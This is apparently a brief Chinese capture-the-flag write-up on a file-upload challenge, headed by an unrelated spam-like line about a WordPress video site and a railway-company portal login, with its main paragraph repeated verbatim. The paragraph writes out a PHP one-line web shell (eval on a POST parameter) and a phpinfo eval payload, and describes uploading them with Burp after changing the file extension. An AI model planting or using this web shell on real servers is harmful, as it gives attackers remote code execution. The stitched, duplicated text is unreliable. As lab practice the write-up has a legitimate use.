wordpress做的视听网站中国铁建门户网登录入口
发现是上传文件第一想到是文件木马 <?php @eval ($_POST[123]);?>木马上传burp修改后缀发现flag里面这个是假的 我们猜想是在phpinfo我们上传<?php @eval('phpinfo();');?>木马上传burp修改后缀里面 Ctrl+F 发现flag
发现是上传文件第一想到是文件木马 <?php @eval ($_POST[123]);?>木马上传burp修改后缀发现flag里面这个是假的 我们猜想是在phpinfo我们上传<?php @eval('phpinfo();');?>木马上传burp修改后缀里面 Ctrl+F 发现flag